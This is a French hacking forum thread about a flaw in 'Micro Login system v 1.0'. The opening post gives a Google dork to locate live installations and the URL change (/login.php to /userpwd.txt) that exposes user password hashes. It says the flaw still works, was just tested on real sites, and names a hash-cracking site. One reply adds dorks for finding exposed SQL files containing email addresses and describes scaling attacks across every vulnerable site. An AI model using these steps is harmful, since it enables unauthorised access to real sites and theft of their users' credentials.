Annonce

Réduire
Aucune annonce.

[FAILLE]Micro Login system v 1.0

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • [FAILLE]Micro Login system v 1.0

    Salut,

    En ce moment, il tourne cette faille assez simple car il suffit simplement de changer le chemin (path) de l'url.Et donc, on récupére les passwords en .txt.

    Tapez ce dork: intext:"micro login system v 1.0"

    Voila et tous les sites dont l'url aura comme terminaison : /login.php ou /register.php vous changez par /userpwd.txt

    ex:

    http://www.cible.com/login/login.php

    deviens

    http://www.cible.com/login/userpwd.txt

    Vous attérissez tout droit sur la page avec les pseudos et les pass hasher. Y a plus qu'à aller sur un bon site pour décoder le Hash : http://www.md5online.fr/

    Je trouve que des failles comme celle la sont reposantes^^.

    Elle est valable encore en ce moment je viens de tester sur la première page.
    Dernière modification par DreAmuS, 30 septembre 2014, 14h23.

  • #2
    Grâce à toi je suis un hacker merci ;D

    Commentaire


    • #3
      La question que je me pose est comment trouver des sites ayant ce genre de pages ? Tomber dessus par chance, ou contrôler la chance. Y a t-il un moyen de rechercher ces sites là ?

      Commentaire


      • #4
        Damien tu n'es pas un hacker grâce à ce simple Dork. Hacker est un état d'esprit,c'est un mode de vie, la recherche constante pour braver les interdits,c'est l'apprentissage tous les jours de nouveaux langages,systèmes : "Apprendre,Savoir,Connaître et Exploiter". Pour en devenir un bon ,il faut presqu'une vie. Peu d'élu qui arrive à comprendre les diffèrents langages et les méandres des systèmes afin de les contourner , si si peu.

        @Zarl
        "
        Beaucoup de site possèdent ce genre de faille et par simple modification de l'url on peut ainsi acceder à des fichiers tiers:.pdf,.txt et même htaccess et j'en passe. Bien sur il faut que les fichiers soient open à la lecture.

        On peut par exemple chercher des pdf : On taperais : filetypedf nom_de_la_recherche A la place de Nom de la recherche le type de pdf recherché.
        On peut aussi chercher des fichiers comme des adresses mail.
        ext:sql intext:@outlook.com
        ext remplace filetype on demande l'extension sql visible par tous bien sur, et intext tous ce qui sera écrit en terminaison @outlook.com

        Tu vois c'est infinis.Souvent on peut avant de scanner un site simplement chercher si des fichiers sont accessibles au public et permettrais une compromission même mineure du système entier.

        Donc pour répondre à ta question Zarl il faut étudier les commandes Google de recherche puis ensuite essayer des manip entre elles logiques bien sur pas du n'importe quoi et voir ce qu'il en résultent. Souvent on va chercher des mails,sql,passwd,... Ensuite la interviens le savoir faire du hackeur pour exploiter ce qu'il a pu trouver.Dans ce cas précis on tape au hasard et défois il fait bien les choses.

        Mais dans d'autres cas,on découvre une faille sur un nouveau module,... puis on automatise nos recherches via un Google Dork de recherche. Imagine tu trouve une faille XSS sur un nouveau module chat sur tel type de CMS, tu va ecrire un Dork afin de tous les trouver et généraliser ton attaque.Lors du partage tu identifiera le système,la faille,le POC,le Dork de recherche et finalement la description."

        Le Hacking Google a encore de longues années devant lui.
        Dernière modification par DreAmuS, 03 octobre 2014, 12h29.

        Commentaire

        Chargement...
        X